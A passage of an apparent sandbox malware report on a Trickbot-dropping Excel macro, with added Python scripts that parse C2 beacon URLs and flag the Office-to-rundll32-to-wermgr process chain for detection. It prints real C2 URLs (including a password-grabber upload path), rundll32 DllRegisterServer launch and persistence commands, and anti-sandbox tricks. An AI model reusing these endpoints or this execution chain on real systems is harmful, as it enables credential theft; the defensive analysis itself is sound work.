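    "wermgr.exe, 00000006.00000002.2357267628.0000000000340000.00000004.00000020.sdmp | String found in binary or memory: https://193.8.194.96/rob60/813435_W617601.8B73F080286CDBB0F9B96995D4E87F7B/1/rznnTbpNFJV19x1x/U",
    "wermgr.exe, 00000006.00000002.2362530513.000000003337E000.00000004.00000001.sdmp | String found in binary or memory: https://193.8.194.96/rob60/813435_W617601.8B73F080286CDBB0F9B96995D4E87F7B/64/pwgrab/DEBG//e",
    "wermgr.exe, 00000006.00000002.2362547188.0000000033395000.00000004.00000001.sdmp | String found in binary or memory: https://193.8.194.96/rob60/813435_W617601.8B73F080286CDBB0F9B96995D4E87F7B/64/pwgrab/DPST//",
    "wermgr.exe, 00000006.00000002.2357305379.00000000003BD000.00000004.00000020.sdmp | String found in binary or memory: https://secure.comodo.com/CPS0",
    "wermgr.exe, 00000006.00000002.2357305379.00000000003BD000.00000004.00000020.sdmp | String found in binary or memory: http://ocsp.comodoca.com0",
]

URL_RE = re.compile(r"https?://\S+")
# Trickbot client id: <computer name>_<Windows version tag>.<32 hex chars>
CLIENT_ID_RE = re.compile(r"^(?P<name>[^_/]+)_(?P<os>W\d{6})\.(?P<hash>[0-9A-F]{32})$")
# Meaning of the command numbers seen in this report. Assumption taken from
# public Trickbot write-ups; the sandbox report itself does not name them.
COMMAND_NAMES = {1: "keep-alive", 5: "module download", 64: "module data upload"}


@dataclass(frozen=True)
class Beacon:
    host: str
    port: int
    gtag: str        # campaign tag, first path segment ("rob60" here)
    bot_name: str    # computer name part of the client id
    os_tag: str      # Windows version tag, e.g. W617601 = 6.1 build 7601
    bot_hash: str    # 32 hex chars identifying the infected host
    command: int     # numeric command, third path segment
    argument: str    # whatever follows the command (module name, token, data kind)


def parse_beacon(url):
    """Return a Beacon if the URL has the Trickbot C2 path shape, else None."""
    parts = urlsplit(url)
    segs = [s for s in parts.path.split("/") if s]
    if len(segs) < 3 or not segs[2].isdigit():
        return None
    m = CLIENT_ID_RE.match(segs[1])
    if m is None:
        return None
    port = parts.port or (443 if parts.scheme == "https" else 80)
    return Beacon(
        host=parts.hostname,
        port=port,
        gtag=segs[0],
        bot_name=m["name"],
        os_tag=m["os"],
        bot_hash=m["hash"],
        command=int(segs[2]),
        argument="/".join(segs[3:]),
    )


def extract_beacons(lines):
    """Scan report lines for URLs and keep the ones that parse as C2 beacons."""
    found = []
    for line in lines:
        for url in URL_RE.findall(line):
            beacon = parse_beacon(url)
            if beacon is not None:
                found.append(beacon)
    return found


def summarize(beacons):
    """Map each C2 endpoint (host, port) to the set of command numbers seen."""
    summary = {}
    for b in beacons:
        summary.setdefault((b.host, b.port), set()).add(b.command)
    return summary


if __name__ == "__main__":
    beacons = extract_beacons(SAMPLE_LINES)
    for (host, port), cmds in sorted(summarize(beacons).items()):
        names = ", ".join(f"{c} ({COMMAND_NAMES.get(c, 'unknown')})" for c in sorted(cmds))
        print(f"{host}:{port}  gtag={beacons[0].gtag}  commands: {names}")
```

Memory strings carry trailing bytes from adjacent heap data (the `/U`, `/o`, `/3` suffixes above), which is why the parser keys on the first three path segments rather than on the whole URL; the gtag and the 32-hex-char client hash are the stable values to pivot on across samples.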

E-Banking Fraud:

Yara detected Trickbot
Source: Yara match | File source: Process Memory Space: wermgr.exe PID: 2408, type: MEMORY

System Summary:

Found malicious Excel 4.0 Macro
Source: SecuriteInfo.com.Exploit.Siggen3.10350.15803.xls | Initial sample: urlmon
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Source: Screenshot number: 4 | Screenshot OCR: Enable editing button from the yellow bar above 15 " Once you have enabled editing, please click
Source: Screenshot number: 4 | Screenshot OCR: Enable content button jl , ' ' "==~ " from the yellow bar above 1| 24 25 26 27 28 29 30
Source: Document image extraction number: 0 | Screenshot OCR: Enable editing button from the yellow bar above Once you have enabled editing, please click Enable
Source: Document image extraction number: 0 | Screenshot OCR: Enable content button from the yellow bar above I \ , I ' /
Source: Document image extraction number: 1 | Screenshot OCR: Enable editing button from the yellow bar above Once you have enabled editing, please click Enable
Source: Document image extraction number: 1 | Screenshot OCR: Enable content button from the yellow bar above j'
Found Excel 4.0 Macro with suspicious formulas
Source: SecuriteInfo.com.Exploit.Siggen3.10350.15803.xls | Initial sample: EXEC
Office process drops PE file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\10[1].jjkes
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\BASE.BABAA
Source: C:\Windows\SysWOW64\rundll32.exe | Memory allocated: 76E20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe | Memory allocated: 76D20000 page execute and read and write
Source: C:\Windows\System32\wermgr.exe | Code function: 6_2_0007B470 NtDelayExecution,
Source: C:\Windows\System32\wermgr.exe | Code function: 6_2_0006F6B0 NtQueryInformationProcess,
Source: C:\Windows\System32\wermgr.exe | Code function: 6_2_000743C0 NtQuerySystemInformation,DuplicateHandle,CLSIDFromString,CloseHandle,HeapFree,
Source: C:\Windows\System32\wermgr.exe | Code function: 6_2_00068010
Source: C:\Windows\System32\wermgr.exe | Code function: 6_2_00082060
Source: C:\Windows\System32\wermgr.exe | Code function: 6_2_0007D0A0
Source: C:\Windows\System32\wermgr.exe | Code function: 6_2_0007BCA0
Source: C:\Windows\System32\wermgr.exe | Code function: 6_2_00078CA0
Source: C:\Windows\System32\wermgr.exe | Code function: 6_2_0006E0F0
Source: C:\Windows\System32\wermgr.exe | Code function: 6_2_00061500
Source: C:\Windows\System32\wermgr.exe | Code function: 6_2_000789B0
Source: C:\Windows\System32\wermgr.exe | Code function: 6_2_00069200
Source: C:\Windows\System32\wermgr.exe | Code function: 6_2_00061290
Source: C:\Windows\System32\wermgr.exe | Code function: 6_2_0006C290
Source: C:\Windows\System32\wermgr.exe | Code function: 6_2_000743C0
Source: C:\Windows\System32\wermgr.exe | Code function: 6_2_00077840
Source: C:\Windows\System32\wermgr.exe | Code function: 6_2_00080870
Source: C:\Windows\System32\wermgr.exe | Code function: 6_2_000644C0
Source: C:\Windows\System32\wermgr.exe | Code function: 6_2_000790E0
Source: C:\Windows\System32\wermgr.exe | Code function: 6_2_000714F0
Source: C:\Windows\System32\wermgr.exe | Code function: 6_2_00076100
Source: C:\Windows\System32\wermgr.exe | Code function: 6_2_00076D10
Source: C:\Windows\System32\wermgr.exe | Code function: 6_2_00072580
Source: C:\Windows\System32\wermgr.exe | Code function: 6_2_0007CA00
Source: C:\Windows\System32\wermgr.exe | Code function: 6_2_0007BE20
Source: C:\Windows\System32\wermgr.exe | Code function: 6_2_00077630
Source: C:\Windows\System32\wermgr.exe | Code function: 6_2_0007CE70
Source: C:\Windows\System32\wermgr.exe | Code function: 6_2_0006A280
Source: C:\Windows\System32\wermgr.exe | Code function: 6_2_0006CEB0
Source: C:\Windows\System32\wermgr.exe | Code function: 6_2_00073B00
Source: C:\Windows\System32\wermgr.exe | Code function: 6_2_0007B700
Source: C:\Windows\System32\wermgr.exe | Code function: 6_2_0006E310
Source: C:\Windows\System32\wermgr.exe | Code function: 6_2_00062720
Source: C:\Windows\System32\wermgr.exe | Code function: 6_2_00075F70
Source: C:\Windows\System32\wermgr.exe | Code function: 6_2_000763A8
Source: C:\Windows\System32\wermgr.exe | Code function: 6_2_000717B0
Source: C:\Windows\System32\wermgr.exe | Code function: 6_2_00110040
Source: C:\Windows\System32\svchost.exe | Code function: 10_2_0000000180014030
Source: C:\Windows\System32\svchost.exe | Code function: 10_2_00000001800B5134
Source: C:\Windows\System32\svchost.exe | Code function: 10_2_00000001800A114C
Source: C:\Windows\System32\svchost.exe | Code function: 10_2_00000001800A0200
Source: C:\Windows\System32\svchost.exe | Code function: 10_2_000000018001F204
Source: C:\Windows\System32\svchost.exe | Code function: 10_2_00000001800873D0
Source: C:\Windows\System32\svchost.exe | Code function: 10_2_000000018008C5F4
Source: C:\Windows\System32\svchost.exe | Code function: 10_2_000000018008B874
Source: C:\Windows\System32\svchost.exe | Code function: 10_2_000000018009AAF4
Source: C:\Windows\System32\svchost.exe | Code function: 10_2_000000018001EC6C
Source: C:\Windows\System32\svchost.exe | Code function: 10_2_00000001800B4D04
Source: C:\Windows\System32\svchost.exe | Code function: 10_2_000000018008BF24
Source: C:\Windows\System32\svchost.exe | Code function: 10_2_000000018008E000
Source: C:\Windows\System32\svchost.exe | Code function: 10_2_0000000180093044
Source: C:\Windows\System32\svchost.exe | Code function: 10_2_0000000180086048
Source: C:\Windows\System32\svchost.exe | Code function: 10_2_00000001800210A4
Source: C:\Windows\System32\svchost.exe | Code function: 10_2_0000000180003174
Source: C:\Windows\System32\svchost.exe | Code function: 10_2_0000000180005190
Source: C:\Windows\System32\svchost.exe | Code function: 10_2_000000018008C188
Source: C:\Windows\System32\svchost.exe | Code function: 10_2_00000001800651D8
Source: C:\Windows\System32\svchost.exe | Code function: 10_2_000000018008E218
Source: C:\Windows\System32\svchost.exe | Code function: 10_2_000000018008D22C
Source: C:\Windows\System32\svchost.exe | Code function: 10_2_00000001800A9250
Source: C:\Windows\System32\svchost.exe | Code function: 10_2_0000000180023258
Source: C:\Windows\System32\svchost.exe | Code function: 10_2_0000000180001270
Source: C:\Windows\System32\svchost.exe | Code function: 10_2_0000000180010298
Source: C:\Windows\System32\svchost.exe | Code function: 10_2_000000018001C2A8
Source: C:\Windows\System32\svchost.exe | Code function: 10_2_00000001800022B0
Source: C:\Windows\System32\svchost.exe | Code function: 10_2_0000000180016340
Source: C:\Windows\System32\svchost.exe | Code function: 10_2_000000018002535C
Source: C:\Windows\System32\svchost.exe | Code function: 10_2_000000018007B3A8
Source: C:\Windows\System32\svchost.exe | Code function: 10_2_00000001800123C4
Source: C:\Windows\System32\svchost.exe | Code function: 10_2_000000018008C3D0
Source: C:\Windows\System32\svchost.exe | Code function: 10_2_00000001800B3420
Source: C:\Windows\System32\svchost.exe | Code function: 10_2_000000018008E478
Source: C:\Windows\System32\svchost.exe | Code function: 10_2_00000001800794B8
Source: C:\Windows\System32\svchost.exe | Code function: 10_2_00000001800054D4
Source: C:\Windows\System32\svchost.exe | Code function: 10_2_00000001800A14D4
Source: C:\Windows\System32\svchost.exe | Code function: 10_2_00000001800034E0
Source: C:\Windows\System32\svchost.exe | Code function: 10_2_000000018009150C
Source: C:\Windows\System32\svchost.exe | Code function: 10_2_0000000180063548
Source: C:\Windows\System32\svchost.exe | Code function: 10_2_00000001800CB548
Source: C:\Windows\System32\svchost.exe | Code function: 10_2_00000001800CA564
Source: C:\Windows\System32\svchost.exe | Code function: 10_2_000000018005D59C
Source: C:\Windows\System32\svchost.exe | Code function: 10_2_00000001800015A8
Source: C:\Windows\System32\svchost.exe | Code function: 10_2_00000001800935A4
Source: C:\Windows\System32\svchost.exe | Code function: 10_2_00000001800A25D0
Source: C:\Windows\System32\svchost.exe | Code function: 10_2_000000018007E5E0
Source: C:\Windows\System32\svchost.exe | Code function: 10_2_0000000180002614
Source: C:\Windows\System32\svchost.exe | Code function: 10_2_000000018008E668
Source: C:\Windows\System32\svchost.exe | Code function: 10_2_000000018001E6A4
Source: C:\Windows\System32\svchost.exe | Code function: 10_2_00000001800B073C
Source: C:\Windows\System32\svchost.exe | Code function: 10_2_0000000180019748
Source: C:\Windows\System32\svchost.exe | Code function: 10_2_00000001800CB7C0
Source: C:\Windows\System32\svchost.exe | Code function: 10_2_00000001800B27E0
Source: C:\Windows\System32\svchost.exe | Code function: 10_2_000000018000381C
Source: C:\Windows\System32\svchost.exe | Code function: 10_2_00000001800C5828
Source: C:\Windows\System32\svchost.exe | Code function: 10_2_000000018008C844
Source: C:\Windows\System32\svchost.exe | Code function: 10_2_0000000180060854
Source: C:\Windows\System32\svchost.exe | Code function: 10_2_00000001800018EC
Source: C:\Windows\System32\svchost.exe | Code function: 10_2_000000018001B8F4
Source: C:\Windows\System32\svchost.exe | Code function: 10_2_000000018008E938
Source: C:\Windows\System32\svchost.exe | Code function: 10_2_0000000180002958
Source: C:\Windows\System32\svchost.exe | Code function: 10_2_000000018001897C
Source: C:\Windows\System32\svchost.exe | Code function: 10_2_00000001800A99B0
Source: C:\Windows\System32\svchost.exe | Code function: 10_2_00000001800C49AC
Source: C:\Windows\System32\svchost.exe | Code function: 10_2_00000001800249B8
Source: C:\Windows\System32\svchost.exe | Code function: 10_2_00000001800A3A2C
Source: C:\Windows\System32\svchost.exe | Code function: 10_2_0000000180032A2C
Source: C:\Windows\System32\svchost.exe | Code function: 10_2_000000018008BAFC
Source: C:\Windows\System32\svchost.exe | Code function: 10_2_000000018001DB00
Source: C:\Windows\System32\svchost.exe | Code function: 10_2_000000018001DB04
Source: C:\Windows\System32\svchost.exe | Code function: 10_2_000000018001BB4C
Source: C:\Windows\System32\svchost.exe | Code function: 10_2_0000000180090B48
Source: C:\Windows\System32\svchost.exe | Code function: 10_2_0000000180003B54
Source: C:\Windows\System32\svchost.exe | Code function: 10_2_000000018008DBA4
Source: C:\Windows\System32\svchost.exe | Code function: 10_2_000000018005CBF0
Source: C:\Windows\System32\svchost.exe | Code function: 10_2_0000000180001C28
Source: C:\Windows\System32\svchost.exe | Code function: 10_2_0000000180017C44
Source: C:\Windows\System32\svchost.exe | Code function: 10_2_00000001800C1D10
Source: C:\Windows\System32\svchost.exe | Code function: 10_2_0000000180097D1C
Source: C:\Windows\System32\svchost.exe | Code function: 10_2_00000001800ACD50
Source: C:\Windows\System32\svchost.exe | Code function: 10_2_00000001800AEDB4
Source: C:\Windows\System32\svchost.exe | Code function: 10_2_0000000180096DDC
Source: C:\Windows\System32\svchost.exe | Code function: 10_2_00000001800A1E2C
Source: C:\Windows\System32\svchost.exe | Code function: 10_2_0000000180091E50
Source: C:\Windows\System32\svchost.exe | Code function: 10_2_0000000180004E50
Source: C:\Windows\System32\svchost.exe | Code function: 10_2_00000001800BFE6C
Source: C:\Windows\System32\svchost.exe | Code function: 10_2_000000018007DE68
Source: C:\Windows\System32\svchost.exe | Code function: 10_2_000000018008CE80
Source: C:\Windows\System32\svchost.exe | Code function: 10_2_000000018006CEB8
Source: C:\Windows\System32\svchost.exe | Code function: 10_2_0000000180001F6C
Source: C:\Windows\System32\svchost.exe | Code function: 10_2_0000000180035F70
Source: C:\Windows\System32\svchost.exe | Code function: 10_2_00000001800AFFA4
Source: SecuriteInfo.com.Exploit.Siggen3.10350.15803.xls | OLE indicator, VBA macros: true
Source: Joe Sandbox View | Dropped File: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\10[1].jjkes AA7931E3E85D3C5BD6FC2052C38BEE389BFBA9281A8616DA3275149A689EC5EB
Source: Joe Sandbox View | Dropped File: C:\Users\user\BASE.BABAA AA7931E3E85D3C5BD6FC2052C38BEE389BFBA9281A8616DA3275149A689EC5EB
Source: C:\Windows\System32\svchost.exe | Section loaded: imagepop.dll
Source: SecuriteInfo.com.Exploit.Siggen3.10350.15803.xls, type: SAMPLE | Matched rule: SUSP_Excel4Macro_AutoOpen date = 2020-03-26, author = John Lambert @JohnLaTwC, description = Detects Excel4 macro use with auto open / close, score = 2fb198f6ad33d0f26fb94a1aa159fef7296e0421da68887b8f2548bbd227e58f
Source: rundll32.exe, 00000003.00000002.2095309685.0000000001BE0000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2094325254.0000000001D70000.00000002.00000001.sdmp, wermgr.exe, 00000006.00000002.2362993370.0000000033B30000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2357183823.0000000000850000.00000002.00000001.sdmp | Binary or memory string: .VBPud<_
Source: classification engine | Classification label: mal100.troj.spyw.expl.evad.winXLS@14/18@8/13
Source: C:\Windows\System32\wermgr.exe | Code function: 6_2_00064C40 LookupPrivilegeValueW,AdjustTokenPrivileges,CloseHandle,
Source: C:\Windows\System32\svchost.exe | Code function: 10_2_00000001800B4E1C LookupPrivilegeValueA,AdjustTokenPrivileges,
Source: C:\Windows\System32\svchost.exe | Code function: 10_2_00000001800B5134 CreateToolhelp32Snapshot,Process32First,Process32Next,StrStrIA,
Source: C:\Windows\System32\wermgr.exe | Code function: 6_2_0006376C CoCreateInstance,
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\Desktop\D3DE0000
Source: C:\Windows\System32\wermgr.exe | Mutant created: \Sessions\1\BaseNamedObjects\Global\{20D2CF44-ED8C-5F48-68CE-BDAC24C4F6AF}
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Temp\CVRC5FD.tmp
Source: SecuriteInfo.com.Exploit.Siggen3.10350.15803.xls | OLE indicator, Workbook stream: true
Source: C:\Windows\System32\wermgr.exe | System information queried: HandleInformation
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File read: C:\Users\desktop.ini
Source: C:\Windows\System32\rundll32.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Windows\System32\wermgr.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\wermgr.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\wermgr.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\wermgr.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\svchost.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\svchost.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: unknown | Process created: C:\Windows\System32\rundll32.exe rundll32 ..\BASE.BABAA,DllRegisterServer
Source: SecuriteInfo.com.Exploit.Siggen3.10350.15803.xls | Virustotal: Detection: 11%
Source: SecuriteInfo.com.Exploit.Siggen3.10350.15803.xls | ReversingLabs: Detection: 27%
Source: unknown | Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Source: unknown | Process created: C:\Windows\System32\rundll32.exe rundll32 ..\BASE.BABAA,DllRegisterServer
Source: unknown | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32 ..\BASE.BABAA,DllRegisterServer
Source: unknown | Process created: C:\Windows\System32\wermgr.exe C:\Windows\system32\wermgr.exe
Source: unknown | Process created: C:\Windows\System32\wermgr.exe C:\Windows\system32\wermgr.exe
Source: unknown | Process created: C:\Windows\System32\taskeng.exe taskeng.exe {DA6299CA-95CA-4E9D-8945-2CC05321254C} S-1-5-18:NT AUTHORITY\System:Service:
Source: unknown | Process created: C:\Windows\System32\rundll32.exe C:\Windows\system32\rundll32.EXE 'C:\Users\user\AppData\Roaming\QNetMonitor7737977537\rpBASEtx.rrd',DllRegisterServer
Source: unknown | Process created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process created: C:\Windows\System32\rundll32.exe rundll32 ..\BASE.BABAA,DllRegisterServer
Source: C:\Windows\System32\rundll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32 ..\BASE.BABAA,DllRegisterServer
Source: C:\Windows\SysWOW64\rundll32.exe | Process created: C:\Windows\System32\wermgr.exe C:\Windows\system32\wermgr.exe
Source: C:\Windows\SysWOW64\rundll32.exe | Process created: C:\Windows\System32\wermgr.exe C:\Windows\system32\wermgr.exe
Source: C:\Windows\System32\wermgr.exe | Process created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe
Source: C:\Windows\System32\taskeng.exe | Process created: C:\Windows\System32\rundll32.exe C:\Windows\system32\rundll32.EXE 'C:\Users\user\AppData\Roaming\QNetMonitor7737977537\rpBASEtx.rrd',DllRegisterServer
Source: C:\Windows\System32\taskeng.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{92BDB7E4-F28B-46A0-B551-45A52BDD5125}\InprocServer32
Source: Window Recorder | Window detected: More than 3 window changes detected
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: Binary string: F:\projects\cryptor_beta\Bin\Crypter\CrypterDllReleaseNoLogs\Win32\Crypter.pdb | source: rundll32.exe, 00000004.00000002.2095142044.000000006E169000.00000002.00020000.sdmp
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_00321BD0 push dword ptr [edx+14h]; ret
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_00321C7A push dword ptr [edx+14h]; ret
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_00321CFD push dword ptr [edx+14h]; ret
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\10[1].jjkes
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\BASE.BABAA
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\BASE.BABAA
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\10[1].jjkes
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\BASE.BABAA
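The "Process created" findings above are the whole infection chain in parent/child form: EXCEL.EXE launches rundll32 on the dropped BASE.BABAA via DllRegisterServer, the 64-bit rundll32 re-launches itself as 32-bit, rundll32 spawns wermgr.exe twice (the hollowing target the Yara hits land in), wermgr.exe spawns svchost.exe, and later taskeng.exe re-launches the payload from %APPDATA%\QNetMonitor7737977537\rpBASEtx.rrd. The script below is an added example, not part of the Joe Sandbox report or of any Sigma rule: it parses those lines, rebuilds the process tree and applies three checks a SOC would run on EDR telemetry (Office spawning a living-off-the-land binary, rundll32 DllRegisterServer on a module whose extension is not .dll, and a LOLBin or hollowed host spawning a further system binary). The sample lines are copied from this report; the rule names and the binary lists are the example's own choices.

```python
"""Rebuild the process tree from sandbox "Process created" findings and flag
the Office -> rundll32 -> wermgr -> svchost chain this report shows."""
import ntpath
import re
from collections import defaultdict
from dataclasses import dataclass

# Constructed input: the parent/child "Process created" lines from the report,
# in the "Source: <parent> | Process created: <image> <command line>" shape.
SAMPLE_LINES = [
    r"Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process created: C:\Windows\System32\rundll32.exe rundll32 ..\BASE.BABAA,DllRegisterServer",
    r"Source: C:\Windows\System32\rundll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32 ..\BASE.BABAA,DllRegisterServer",
    r"Source: C:\Windows\SysWOW64\rundll32.exe | Process created: C:\Windows\System32\wermgr.exe C:\Windows\system32\wermgr.exe",
    r"Source: C:\Windows\SysWOW64\rundll32.exe | Process created: C:\Windows\System32\wermgr.exe C:\Windows\system32\wermgr.exe",
    r"Source: C:\Windows\System32\wermgr.exe | Process created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe",
    r"Source: C:\Windows\System32\taskeng.exe | Process created: C:\Windows\System32\rundll32.exe C:\Windows\system32\rundll32.EXE 'C:\Users\user\AppData\Roaming\QNetMonitor7737977537\rpBASEtx.rrd',DllRegisterServer",
]

LINE_RE = re.compile(r"^Source: (?P<parent>.+?) \| Process created: (?P<image>\S+) (?P<cmdline>.*)$")
# Module argument of "rundll32 <module>,DllRegisterServer": quoted or bare path.
DLLREG_RE = re.compile(r"(?P<path>'[^']+'|[^\s,']+)\s*,\s*DllRegisterServer", re.IGNORECASE)

OFFICE_APPS = {"excel.exe", "winword.exe", "powerpnt.exe", "outlook.exe"}
# Living-off-the-land binaries an Office process has no business spawning.
LOLBINS = {"rundll32.exe", "regsvr32.exe", "mshta.exe", "wscript.exe",
           "cscript.exe", "cmd.exe", "powershell.exe"}
# System binaries used as hollowing targets (wermgr.exe and svchost.exe here).
HOLLOW_HOSTS = {"wermgr.exe", "svchost.exe"}


@dataclass(frozen=True)
class ProcEvent:
    parent: str
    image: str
    cmdline: str


@dataclass(frozen=True)
class Finding:
    rule: str
    parent: str
    child: str
    detail: str


def parse_line(line):
    m = LINE_RE.match(line.strip())
    return ProcEvent(m["parent"], m["image"], m["cmdline"]) if m else None


def exe_name(path):
    return ntpath.basename(path).lower()


def build_tree(events):
    """Map parent image -> list of child images, in report order."""
    tree = defaultdict(list)
    for ev in events:
        tree[ev.parent].append(ev.image)
    return dict(tree)


def analyze(lines):
    """Parse the lines and return (events, de-duplicated findings)."""
    events = [e for e in map(parse_line, lines) if e is not None]
    findings = []
    for ev in events:
        parent, child = exe_name(ev.parent), exe_name(ev.image)
        if parent in OFFICE_APPS and child in LOLBINS:
            findings.append(Finding("office-spawns-lolbin", parent, child, ev.cmdline))
        if child == "rundll32.exe":
            m = DLLREG_RE.search(ev.cmdline)
            if m:
                module = m["path"].strip("'")
                # A DllRegisterServer export in a .BABAA or .rrd file is a
                # renamed DLL, which is the tell here.
                if ntpath.splitext(module)[1].lower() != ".dll":
                    findings.append(Finding("rundll32-dllregisterserver-non-dll", parent, child, module))
        if child in HOLLOW_HOSTS and parent in LOLBINS | HOLLOW_HOSTS:
            findings.append(Finding("lolbin-spawns-hollow-host", parent, child, ev.cmdline))
    return events, list(dict.fromkeys(findings))


if __name__ == "__main__":
    events, findings = analyze(SAMPLE_LINES)
    for parent, children in build_tree(events).items():
        print(f"{parent}\n    -> " + "\n    -> ".join(children))
    for f in findings:
        print(f"[{f.rule}] {f.parent} -> {f.child}: {f.detail}")
```

The extension check is what separates this sample from a legitimate `rundll32 foo.dll,DllRegisterServer`: both BASE.BABAA and rpBASEtx.rrd carry the export but not the extension, and the second one is launched by the Task Scheduler engine, which is the persistence path rather than the initial delivery.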

                Boot Survival:

                barindex
                Drops PE files to the user root directoryShow sources
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\BASE.BABAAJump to dropped file
                Source: C:\Windows\System32\wermgr.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\wermgr.exe Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\svchost.exe Process information set: NOOPENFILEERRORBOX

                Malware Analysis System Evasion:

                Found evasive API chain (trying to detect sleep duration tampering with parallel thread)
                Source: C:\Windows\System32\wermgr.exe Function Chain: threadCreated,threadDelayed,threadDelayed,userTimerSet,threadDelayed,threadDelayed,fileVolumeQueried,adjustToken,handleClosed,systemQueried,systemQueried,threadDelayed,handleClosed,threadDelayed,mutantCreated,threadInformationSet,threadInformationSet,languageOrLocalQueried,threadDelayed,threadDelayed,threadDelayed,threadInformationSet,threadInformationSet,systemQueried,systemQueried
                Tries to detect virtualization through RDTSC time measurements
                Source: C:\Windows\System32\wermgr.exe RDTSC instruction interceptor: First address: 000000000006EAD0 second address: 000000000006EAD0 instructions: 0x00000000 rdtsc 0x00000002 dec eax 0x00000003 shl edx, 20h 0x00000006 dec eax 0x00000007 or eax, edx 0x00000009 ret 0x0000000a dec esp 0x0000000b mov edi, eax 0x0000000d call dword ptr [0000E3AEh] 0x00000013 jmp 00007F6EE4D30110h 0x00000015 jmp dword ptr [0007C47Ah] 0x0000001b mov ecx, dword ptr [7FFE0004h] 0x00000022 dec eax 0x00000023 mov eax, dword ptr [7FFE0320h] 0x0000002a dec eax 0x0000002b imul eax, ecx 0x0000002e dec eax 0x0000002f shr eax, 18h 0x00000032 ret 0x00000033 inc esp 0x00000034 mov esi, eax 0x00000036 dec ecx 0x00000037 mov esi, edi 0x00000039 dec eax 0x0000003a xor esi, FFFFFF00h 0x00000040 dec ecx 0x00000041 and esi, edi 0x00000043 call 00007F6EE4D27FA6h 0x00000048 rdtsc
                Source: C:\Windows\System32\wermgr.exe Code function: 6_2_0006EAD0 rdtsc
                Source: C:\Windows\System32\wermgr.exe Code function: GetAdaptersInfo,
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\10[1].jjkes
                Source: C:\Windows\System32\taskeng.exe TID: 1288 Thread sleep time: -60000s >= -30000s
                Source: C:\Windows\System32\svchost.exe TID: 1464 Thread sleep time: -120000s >= -30000s
                Source: C:\Windows\System32\svchost.exe TID: 1464 Thread sleep time: -60000s >= -30000s
                Source: C:\Windows\System32\wermgr.exe Last function: Thread delayed
                Source: C:\Windows\System32\wermgr.exe Code function: 6_2_00061290 FindFirstFileW,FindNextFileW,
                Source: C:\Windows\System32\wermgr.exe Code function: 6_2_000646F0 FindFirstFileW,FindNextFileW,
                Source: C:\Windows\System32\wermgr.exe Code function: 6_2_0007FBB0 FindFirstFileW,SleepEx,FindNextFileW,
                Source: C:\Windows\System32\svchost.exe Code function: 10_2_00000001800836A4 GetSystemInfo,
                Source: C:\Windows\System32\svchost.exe Process information queried: ProcessInformation
